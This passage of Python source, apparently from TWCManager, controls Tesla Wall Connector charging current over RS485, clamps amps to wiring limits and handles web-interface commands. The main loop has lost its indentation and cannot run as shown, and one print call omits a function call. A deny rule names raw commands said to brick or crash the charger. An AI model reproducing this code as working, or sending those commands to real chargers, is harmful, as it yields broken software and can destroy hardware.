                    # ...and car hasn't changed its amp draw significantly in
                    # over 10 seconds, meaning it's stuck at its current amp
                    # draw.
                    now - self.timeReportedAmpsActualChangedSignificantly > 10
                )
            ):
                # We must set desiredAmpsOffered to a value that gets
                # reportedAmpsActual (amps the car is actually using) up to
                # a value near lastAmpsOffered. At the end of all these
                # checks, we'll set lastAmpsOffered = desiredAmpsOffered and
                # timeLastAmpsOfferedChanged if the value of lastAmpsOffered was
                # actually changed.
                if(self.lastAmpsOffered == spikeAmpsToCancel6ALimit
                   and now - self.timeLastAmpsOfferedChanged > 10):
                    # We've been offering the car spikeAmpsToCancel6ALimit
                    # for over 10 seconds but it's still drawing at least
                    # 2A less than spikeAmpsToCancel6ALimit. I saw this
                    # happen once when an error stopped the car from
                    # charging and when the error cleared, it was offered
                    # spikeAmpsToCancel6ALimit as the first value it saw.
                    # The car limited itself to 6A indefinitely. In this
                    # case, the fix is to offer it lower amps.
                    if(debugLevel >= 1):
                        print(time_now() + ': Car stuck when offered spikeAmpsToCancel6ALimit. Offering 2 less.')
                    desiredAmpsOffered = spikeAmpsToCancel6ALimit - 2.0
                elif(now - self.timeLastAmpsOfferedChanged > 5):
                    # self.lastAmpsOffered hasn't gotten the car to draw
                    # enough amps for over 5 seconds, so try
                    # spikeAmpsToCancel6ALimit
                    desiredAmpsOffered = spikeAmpsToCancel6ALimit
                else:
                    # Otherwise, don't change the value of lastAmpsOffered.
                    desiredAmpsOffered = self.lastAmpsOffered

                # Note that the car should have no problem increasing max
                # amps to any whole value over spikeAmpsToCancel6ALimit as
                # long as it's below any upper limit manually set in the
                # car's UI. One time when I couldn't get TWC to push the car
                # over 21A, I found the car's UI had set itself to 21A
                # despite setting it to 40A the day before. I have been
                # unable to reproduce whatever caused that problem.
            elif(desiredAmpsOffered < self.lastAmpsOffered):
                # Tesla doesn't mind if we set a lower amp limit than the
                # one we're currently using, but make sure we don't change
                # limits more often than every 5 seconds. This has the side
                # effect of holding spikeAmpsToCancel6ALimit set earlier for
                # 5 seconds to make sure the car sees it.
                if(debugLevel >= 10):
                    print('Reduce amps: time - self.timeLastAmpsOfferedChanged ' +
                          str(int(now - self.timeLastAmpsOfferedChanged)))
                if(now - self.timeLastAmpsOfferedChanged < 5):
                    desiredAmpsOffered = self.lastAmpsOffered

    # set_last_amps_offered does some final checks to see if the new
    # desiredAmpsOffered is safe. It should be called after we've picked a
    # final value for desiredAmpsOffered.
    desiredAmpsOffered = self.set_last_amps_offered(desiredAmpsOffered)

    # See notes in send_slave_heartbeat() for details on how we transmit
    # desiredAmpsOffered and the meaning of the code in
    # self.masterHeartbeatData[0].
    #
    # Rather than only sending desiredAmpsOffered when slave is sending code
    # 04 or 08, it seems to work better to send desiredAmpsOffered whenever
    # it does not equal self.reportedAmpsMax reported by the slave TWC.
    # Doing it that way will get a slave charging again even when it's in
    # state 00 or 03 which it swings between after you set
    # desiredAmpsOffered = 0 to stop charging.
    #
    # I later found that a slave may end up swinging between state 01 and 03
    # when desiredAmpsOffered == 0:
    #   S 032e 0.25/0.00A: 01 0000 0019 0000  M: 00 0000 0000 0000
    #   S 032e 0.25/6.00A: 03 0258 0019 0000  M: 05 0000 0000 0000
    #   S 032e 0.25/0.00A: 01 0000 0019 0000  M: 00 0000 0000 0000
    #   S 032e 0.25/6.00A: 03 0258 0019 0000  M: 05 0000 0000 0000
    #
    # While it's doing this, it's continuously opening and closing the relay
    # on the TWC each second which makes an audible click and will wear out
    # the relay. To avoid that problem, always send code 05 when
    # desiredAmpsOffered == 0. In that case, slave's response should always
    # look like this:
    #   S 032e 0.25/0.00A: 03 0000 0019 0000 M: 05 0000 0000 0000
    if(self.reportedAmpsMax != desiredAmpsOffered
       or desiredAmpsOffered == 0
    ):
        desiredHundredthsOfAmps = int(desiredAmpsOffered * 100)
        self.masterHeartbeatData = bytearray([(0x09 if self.protocolVersion == 2 else 0x05),
                                              (desiredHundredthsOfAmps >> 8) & 0xFF,
                                              desiredHundredthsOfAmps & 0xFF,
                                              0x00,0x00,0x00,0x00,0x00,0x00])
    else:
        self.masterHeartbeatData = bytearray([0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00])

    if(len(overrideMasterHeartbeatData) >= 7):
        self.masterHeartbeatData = overrideMasterHeartbeatData

    if(debugLevel >= 1):
        self.print_status(heartbeatData)
def set_last_amps_offered(self, desiredAmpsOffered):
    """Record a new value for self.lastAmpsOffered, clamping it for safety.

    This is the only place self.lastAmpsOffered should be assigned. The
    requested value is reduced if it would push the combined draw of all
    TWCs past wiringMaxAmpsAllTWCs, and capped at this TWC's own
    self.wiringMaxAmps. When the stored value actually changes,
    self.timeLastAmpsOfferedChanged is stamped with the current time.
    Returns the (possibly clamped) value now held in self.lastAmpsOffered.
    """
    global debugLevel

    if(debugLevel >= 10):
        print("set_last_amps_offered(TWCID=" + hex_str(self.TWCID) +
              ", desiredAmpsOffered=" + str(desiredAmpsOffered) + ")")

    # Nothing to do when the requested offer matches what we already hold.
    if(desiredAmpsOffered == self.lastAmpsOffered):
        return self.lastAmpsOffered

    previousOffer = self.lastAmpsOffered
    self.lastAmpsOffered = desiredAmpsOffered

    # Projected total draw across all TWCs: what everyone is actually using
    # now, with this TWC's actual draw swapped for the amps we want to offer.
    projectedTotalAmps = (total_amps_actual_all_twcs()
                          - self.reportedAmpsActual + self.lastAmpsOffered)
    if(projectedTotalAmps > wiringMaxAmpsAllTWCs):
        # Offering desiredAmpsOffered would overload the shared wiring.
        # Offer only as many amps as bring the total up to the wiring limit.
        self.lastAmpsOffered = int(wiringMaxAmpsAllTWCs -
                                   (total_amps_actual_all_twcs() - self.reportedAmpsActual))

        if(self.lastAmpsOffered < self.minAmpsTWCSupports):
            # Always offer at least minAmpsTWCSupports amps.
            # See notes in receive_slave_heartbeat() beneath
            # 'if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):'
            self.lastAmpsOffered = self.minAmpsTWCSupports

        print("WARNING: Offering slave TWC %02X%02X %.1fA instead of " \
              "%.1fA to avoid overloading wiring shared by all TWCs." % (
              self.TWCID[0], self.TWCID[1], self.lastAmpsOffered, desiredAmpsOffered))

    if(self.lastAmpsOffered > self.wiringMaxAmps):
        # This case is common in some setups (e.g. two 80A TWCs sharing a
        # 125A line), so cap quietly rather than printing an error.
        self.lastAmpsOffered = self.wiringMaxAmps
        if(debugLevel >= 10):
            print("Offering slave TWC %02X%02X %.1fA instead of " \
                  "%.1fA to avoid overloading the TWC rated at %.1fA." % (
                  self.TWCID[0], self.TWCID[1], self.lastAmpsOffered,
                  desiredAmpsOffered, self.wiringMaxAmps))

    # Only stamp the change time if clamping didn't land us back on the
    # value we started with.
    if(self.lastAmpsOffered != previousOffer):
        self.timeLastAmpsOfferedChanged = time.time()

    return self.lastAmpsOffered
#
# End TWCSlave class
#
##############################


##############################
#
# Begin global vars
#

# RS485 receive-buffer state: raw bytes read so far and the message being
# assembled from them.
data = ''
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0

lastTWCResponseMsg = None
# When non-empty (>= 7 bytes), replaces the computed master heartbeat payload.
overrideMasterHeartbeatData = b''
masterTWCID = ''
# Default payload a fake slave reports in its heartbeats.
slaveHeartbeatData = bytearray([0x01,0x0F,0xA0,0x0F,0xA0,0x00,0x00,0x00,0x00])
# Count-down of linkready1/linkready2 messages still to broadcast at startup.
numInitMsgsToSend = 10
msgRxCount = 0
timeLastTx = 0

# Known slave TWCs, keyed by ID, plus the round-robin list used to pick which
# slave gets the next master heartbeat.
slaveTWCs = {}
slaveTWCRoundRobin = []
idxSlaveToSendNextHeartbeat = 0

# Amp-limit policy state (charge-now override, scheduled hours, green energy).
maxAmpsToDivideAmongSlaves = 0
scheduledAmpsMax = -1
scheduledAmpsStartHour = -1
scheduledAmpsEndHour = -1
scheduledAmpsDaysBitmap = 0x7F
chargeNowAmps = 0
chargeNowTimeEnd = 0
# Amps to briefly offer to cancel the car's firmware 6A-limit bug; see
# receive_slave_heartbeat().
spikeAmpsToCancel6ALimit = 16
timeLastGreenEnergyCheck = 0
hourResumeTrackGreenEnergy = -1
# Running kWh counter; 119 is presumably just an initial/sample value —
# it is overwritten by load_settings() when saved settings exist (verify).
kWhDelivered = 119
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()

# __file__ contains the path to the running script. Replace the script name with
# TWCManagerSettings.txt. This gives us a path that will always locate
# TWCManagerSettings.txt in the same directory as the script even when pwd does
# not match the script directory.
settingsFileName = re.sub(r'/[^/]+$', r'/TWCManagerSettings.txt', __file__)
nonScheduledAmpsMax = -1
timeLastHeartbeatDebugOutput = 0

# Web-interface IPC message state.
webMsgPacked = ''
webMsgMaxSize = 300
webMsgResult = 0

timeTo0Aafter06 = 0
timeToRaise2A = 0

# Tesla car API session state.
carApiLastErrorTime = 0
carApiBearerToken = ''
carApiRefreshToken = ''
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiVehicles = []

# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reachable, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = ['upstream internal error', 'operation_timedout',
'vehicle unavailable']

# Define minutes between retrying non-transient errors.
carApiErrorRetryMins = 10

# Home location for geofenced car-API charging; 10000 means "not set".
homeLat = 10000
homeLon = 10000

# Queue plus lock used to hand slow work (car API calls, green energy checks)
# to the background thread.
backgroundTasksQueue = queue.Queue()
backgroundTasksCmds = {}
backgroundTasksLock = threading.Lock()

# Open the RS485 adapter used to talk to the TWCs.
ser = None
ser = serial.Serial(rs485Adapter, baud, timeout=0)

#
# End global vars
#
##############################
#
# Begin main program
#

# Restore persisted state (amp limits, kWh counters, car API tokens, ...)
# before anything uses it.
load_settings()

# Create a background thread to handle tasks that take too long on the main
# thread.  For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=())
# Daemonize so the interpreter can exit without waiting for this thread.
backgroundTasksThread.daemon = True
backgroundTasksThread.start()


# Create an IPC (Interprocess Communication) message queue that we can
# periodically check to respond to queries from the TWCManager web interface.
#
# These messages will contain commands like "start charging at 10A" or may ask
# for information like "how many amps is the solar array putting out".
#
# The message queue is identified by a numeric key. This script and the web
# interface must both use the same key. The "ftok" function facilitates creating
# such a key based on a shared piece of information that is not likely to
# conflict with keys chosen by any other process in the system.
#
# ftok reads the inode number of the file or directory pointed to by its first
# parameter. This file or dir must already exist and the permissions on it don't
# seem to matter. The inode of a particular file or dir is fairly unique but
# doesn't change often so it makes a decent choice for a key. We use the parent
# directory of the TWCManager script.
#
# The second parameter to ftok is a single byte that adds some additional
# uniqueness and lets you create multiple queues linked to the file or dir in
# the first param. We use 'T' for Tesla.
#
# If you can't get this to work, you can also set key = <some arbitrary number>
# and in the web interface, use the same arbitrary number. While that could
# conflict with another process, it's very unlikely to.
webIPCkey = sysv_ipc.ftok(re.sub('/[^/]+$', '/', __file__), ord('T'), True)

# Use the key to create a message queue with read/write access for all users.
webIPCqueue = sysv_ipc.MessageQueue(webIPCkey, sysv_ipc.IPC_CREAT, 0o666)
# Use 'is None' (identity) rather than '== None' when testing for None.
if(webIPCqueue is None):
    print("ERROR: Can't create Interprocess Communication message queue to communicate with web interface.")

# After the IPC message queue is created, if you type 'sudo ipcs -q' on the
# command line, you should see something like:
#     ------ Message Queues --------
#     key        msqid      owner      perms      used-bytes   messages
#     0x5402ed16 491520     pi         666        0            0
#
# Notice that we've created the only IPC message queue in the system. Apparently
# default software on the pi doesn't use IPC or if it does, it creates and
# deletes its message queues quickly.
#
# If you want to get rid of all queues because you created extras accidentally,
# reboot or type 'sudo ipcrm -a msg'.  Don't get rid of all queues if you see
# ones you didn't create or you may crash another process.
# Find more details in IPC here:
# http://www.onlamp.com/pub/a/php/2004/05/13/shared_memory.html

print("TWC Manager starting as fake %s with id %02X%02X and sign %02X" \
    % ( ("Master" if fakeMaster else "Slave"), \
    ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if(fakeMaster == 1):
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if(numInitMsgsToSend > 5):
send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif(numInitMsgsToSend > 0):
send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if(time.time() - timeLastTx >= 1.0):
# It's been about a second since our last heartbeat.
if(len(slaveTWCRoundRobin) > 0):
slaveTWC = slaveTWCRoundRobin[idxSlaveToSendNextHeartbeat]
if(time.time() - slaveTWC.timeLastRx > 26):
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
print(time_now() + ": WARNING: We haven't heard from slave " \
"%02X%02X for over 26 seconds. " \
"Stop sending them heartbeat messages." % \
(slaveTWC.TWCID[0], slaveTWC.TWCID[1]))
delete_slave(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if(idxSlaveToSendNextHeartbeat >= len(slaveTWCRoundRobin)):
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if(fakeMaster != 2 and time.time() - timeLastTx >= 10.0):
if(debugLevel >= 1):
print("Advertise fake slave %02X%02X with sign %02X is " \
"ready to link once per 10 seconds as long as master " \
"hasn't sent a heartbeat in the last 10 seconds." % \
(ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
send_slave_linkready()
########################################################################
# See if there's any message from the web interface.
# If the message is longer than msgMaxSize, MSG_NOERROR tells it to
# return what it can of the message and discard the rest.
# When no message is available, IPC_NOWAIT tells msgrcv to return
# msgResult = 0 and $! = 42 with description 'No message of desired
# type'.
# If there is an actual error, webMsgResult will be -1.
# On success, webMsgResult is the length of webMsgPacked.
try:
webMsgRaw = webIPCqueue.receive(False, 2)
if(len(webMsgRaw[0]) > 0):
webMsgType = webMsgRaw[1]
unpacked = struct.unpack('=LH', webMsgRaw[0][0:6])
webMsgTime = unpacked[0]
webMsgID = unpacked[1]
webMsg = webMsgRaw[0][6:len(webMsgRaw[0])]
if(debugLevel >= 1):
webMsgRedacted = webMsg
# Hide car password in web request to send password to Tesla
m = re.search(b'^(carApiEmailPassword=[^\n]+\n)', webMsg, re.MULTILINE)
if(m):
webMsgRedacted = m.group(1) + b'[HIDDEN]'
print(time_now() + ": Web query: '" + str(webMsgRedacted) + "', id " + str(webMsgID) +
", time " + str(webMsgTime) + ", type " + str(webMsgType))
webResponseMsg = ''
numPackets = 0
if(webMsg == b'getStatus'):
needCarApiBearerToken = False
if(carApiBearerToken == ''):
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].protocolVersion == 2):
needCarApiBearerToken = True
webResponseMsg = (
"%.2f" % (maxAmpsToDivideAmongSlaves) +
'`' + "%.2f" % (wiringMaxAmpsAllTWCs) +
'`' + "%.2f" % (minAmpsPerTWC) +
'`' + "%.2f" % (chargeNowAmps) +
'`' + str(nonScheduledAmpsMax) +
'`' + str(scheduledAmpsMax) +
'`' + "%02d:%02d" % (int(scheduledAmpsStartHour),
int((scheduledAmpsStartHour % 1) * 60)) +
'`' + "%02d:%02d" % (int(scheduledAmpsEndHour),
int((scheduledAmpsEndHour % 1) * 60)) +
'`' + str(scheduledAmpsDaysBitmap) +
'`' + "%02d:%02d" % (int(hourResumeTrackGreenEnergy),
int((hourResumeTrackGreenEnergy % 1) * 60)) +
# Send 1 if we need an email/password entered for car api, otherwise send 0
'`' + ('1' if needCarApiBearerToken else '0') +
'`' + str(len(slaveTWCRoundRobin))
)
for i in range(0, len(slaveTWCRoundRobin)):
webResponseMsg += (
'`' + "%02X%02X" % (slaveTWCRoundRobin[i].TWCID[0],
slaveTWCRoundRobin[i].TWCID[1]) +
'~' + str(slaveTWCRoundRobin[i].maxAmps) +
'~' + "%.2f" % (slaveTWCRoundRobin[i].reportedAmpsActual) +
'~' + str(slaveTWCRoundRobin[i].lastAmpsOffered) +
'~' + str(slaveTWCRoundRobin[i].reportedState)
)
elif(webMsg[0:20] == b'setNonScheduledAmps='):
m = re.search(b'([-0-9]+)', webMsg[19:len(webMsg)])
if(m):
nonScheduledAmpsMax = int(m.group(1))
# Save nonScheduledAmpsMax to SD card so the setting
# isn't lost on power failure or script restart.
save_settings()
elif(webMsg[0:17] == b'setScheduledAmps='):
m = re.search(b'([-0-9]+)\nstartTime=([-0-9]+):([0-9]+)\nendTime=([-0-9]+):([0-9]+)\ndays=([0-9]+)', \
webMsg[17:len(webMsg)], re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
scheduledAmpsStartHour = int(m.group(2)) + (int(m.group(3)) / 60)
scheduledAmpsEndHour = int(m.group(4)) + (int(m.group(5)) / 60)
scheduledAmpsDaysBitmap = int(m.group(6))
save_settings()
elif(webMsg[0:30] == b'setResumeTrackGreenEnergyTime='):
m = re.search(b'([-0-9]+):([0-9]+)', webMsg[30:len(webMsg)], re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = int(m.group(1)) + (int(m.group(2)) / 60)
save_settings()
elif(webMsg[0:11] == b'sendTWCMsg='):
m = re.search(b'([0-9a-fA-F]+)', webMsg[11:len(webMsg)], re.MULTILINE)
if(m):
twcMsg = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
15 if len(slaveTWCRoundRobin) == 0 \
or slaveTWCRoundRobin[0].protocolVersion == 2 else 13)
if((twcMsg[0:2] == b'\xFC\x19') or (twcMsg[0:2] == b'\xFC\x1A')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could permanently disable the TWC. Aborting.\n")
elif((twcMsg[0:2] == b'\xFB\xE8')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could crash the TWC. Aborting.\n")
else:
lastTWCResponseMsg = bytearray();
send_msg(twcMsg)
elif(webMsg == b'getLastTWCMsgResponse'):
if(lastTWCResponseMsg != None and lastTWCResponseMsg != b''):
webResponseMsg = hex_str(lastTWCResponseMsg)
else:
webResponseMsg = 'None'
elif(webMsg[0:20] == b'carApiEmailPassword='):
m = re.search(b'([^\n]+)\n([^\n]+)', webMsg[20:len(webMsg)], re.MULTILINE)
if(m):
queue_background_task({'cmd':'carApiEmailPassword',
'email':m.group(1).decode('ascii'),
'password':m.group(2).decode('ascii')})
elif(webMsg[0:23] == b'setMasterHeartbeatData='):
m = re.search(b'([0-9a-fA-F]*)', webMsg[23:len(webMsg)], re.MULTILINE)
if(m):
if(len(m.group(1)) > 0):
overrideMasterHeartbeatData = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
9 if slaveTWCRoundRobin[0].protocolVersion == 2 else 7)
else:
overrideMasterHeartbeatData = b''
elif(webMsg == b'chargeNow'):
chargeNowAmps = wiringMaxAmpsAllTWCs
chargeNowTimeEnd = now + 60*60*24
elif(webMsg == b'chargeNowCancel'):
chargeNowAmps = 0
chargeNowTimeEnd = 0
elif(webMsg == b'dumpState'):
# dumpState commands are used for debugging. They are called
# using a web page:
# http://(Pi address)/index.php?submit=1&dumpState=1
webResponseMsg = ('time=' + str(now) + ', fakeMaster='
+ str(fakeMaster) + ', rs485Adapter=' + rs485Adapter
+ ', baud=' + str(baud)
+ ', wiringMaxAmpsAllTWCs=' + str(wiringMaxAmpsAllTWCs)
+ ', wiringMaxAmpsPerTWC=' + str(wiringMaxAmpsPerTWC)
+ ', minAmpsPerTWC=' + str(minAmpsPerTWC)
+ ', greenEnergyAmpsOffset=' + str(greenEnergyAmpsOffset)
+ ', debugLevel=' + str(debugLevel)
+ '\n')
webResponseMsg += (
'carApiStopAskingToStartCharging=' + str(carApiStopAskingToStartCharging)
+ '\ncarApiLastStartOrStopChargeTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastStartOrStopChargeTime)))
+ '\ncarApiLastErrorTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastErrorTime)))
+ '\ncarApiTokenExpireTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiTokenExpireTime)))
+ '\n'
)
for vehicle in carApiVehicles:
webResponseMsg += str(vehicle.__dict__) + '\n'
webResponseMsg += 'slaveTWCRoundRobin:\n'
for slaveTWC in slaveTWCRoundRobin:
webResponseMsg += str(slaveTWC.__dict__) + '\n'
numPackets = math.ceil(len(webResponseMsg) / 290)
elif(webMsg[0:14] == b'setDebugLevel='):
m = re.search(b'([-0-9]+)', webMsg[14:len(webMsg)], re.MULTILINE)
if(m):
debugLevel = int(m.group(1))
else:
print(time_now() + ": Unknown IPC request from web server: " + str(webMsg))
if(len(webResponseMsg) > 0):
if(debugLevel >= 5):
print(time_now() + ": Web query response: '" + webResponseMsg + "'")
try:
if(numPackets == 0):
if(len(webResponseMsg) > 290):
webResponseMsg = webResponseMsg[0:290]
webIPCqueue.send(struct.pack('=LH' + str(len(webResponseMsg)) + 's', webMsgTime, webMsgID,
webResponseMsg.encode('ascii')), block=False)
else:
# In this case, block=False prevents blocking if the message
# queue is too full for our message to fit. Instead, an
# error is returned.
msgTemp = struct.pack('=LH1s', webMsgTime, webMsgID, bytearray([numPackets]))
webIPCqueue.send(msgTemp, block=False)
for i in range(0, numPackets):
packet = webResponseMsg[i*290:i*290+290]
webIPCqueue.send(struct.pack('=LH' + str(len(packet)) + 's', webMsgTime, webMsgID,
packet.encode('ascii')), block=False)
except sysv_ipc.BusyError:
print(time_now() + ": Error: IPC queue full when trying to send response to web interface.")
except sysv_ipc.BusyError:
# No web message is waiting.
pass
########################################################################
# See if there's an incoming message on the RS485 interface.
timeMsgRxStart = time.time()
while True:
now = time.time()
dataLen = ser.inWaiting()
if(dataLen == 0):
if(msgLen == 0):
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if(now - timeMsgRxStart >= 2.0):
if(debugLevel >= 9):
print(time_now() + ": Msg timeout (" + hex_str(ignoredData) +
') ' + hex_str(msg[0:msgLen]))
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
dataLen = 1
data = ser.read(dataLen)
if(dataLen != 1):
# This should never happen
print("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if(msgLen == 0 and data[0] != 0xc0):
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
if(debugLevel >= 11):
print("Ignoring byte %02X between messages." % (data[0]))
ignoredData += data
continue
elif(msgLen > 0 and msgLen < 15 and data[0] == 0xc0):
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
if(debugLevel >= 10):
print("Found end of message before full-length message received. " \
"Discard and wait for new message.")
msg = data
msgLen = 1
continue
if(msgLen == 0):
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in send_msg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if(msgLen >= 16 and data[0] == 0xc0):
break
if(msgLen >= 16):
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if(lastTWCResponseMsg == b''
and msg[0:2] != b'\xFB\xE0' and msg[0:2] != b'\xFD\xE0'
and msg[0:2] != b'\xFC\xE1' and msg[0:2] != b'\xFB\xE2'
and msg[0:2] != b'\xFD\xE2' and msg[0:2] != b'\xFB\xEB'
and msg[0:2] != b'\xFD\xEB' and msg[0:2] != b'\xFD\xE0'
):
lastTWCResponseMsg = msg
if(debugLevel >= 9):
print("Rx@" + time_now() + ": (" + hex_str(ignoredData) + ') ' \
+ hex_str(msg) + "")
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if(len(msg) != 14 and len(msg) != 16 and len(msg) != 20):
# In firmware 4.5.3, FD EB (kWh and voltage report), FD ED, FD
# EE, FD EF, FD F1, and FB A4 messages are length 20 while most
# other messages are length 16. I'm not sure if there are any
# length 14 messages remaining.
print(time_now() + ": ERROR: Ignoring message of unexpected length %d: %s" % \
(len(msg), hex_str(msg)))
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if((checksum & 0xFF) != checksumExpected):
print("ERROR: Checksum %X does not match %02X. Ignoring message: %s" %
(checksum, checksumExpected, hex_str(msg)))
continue
if(fakeMaster == 1):
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b'^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(maxAmps >= 80):
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
spikeAmpsToCancel6ALimit = 21
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
spikeAmpsToCancel6ALimit = 16
if(senderID == fakeTWCID):
print(time_now + ": Slave TWC %02X%02X reports same TWCID as master. " \
"Slave should resolve by changing its TWCID." % \
(senderID[0], senderID[1]))
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = new_slave(senderID, maxAmps)
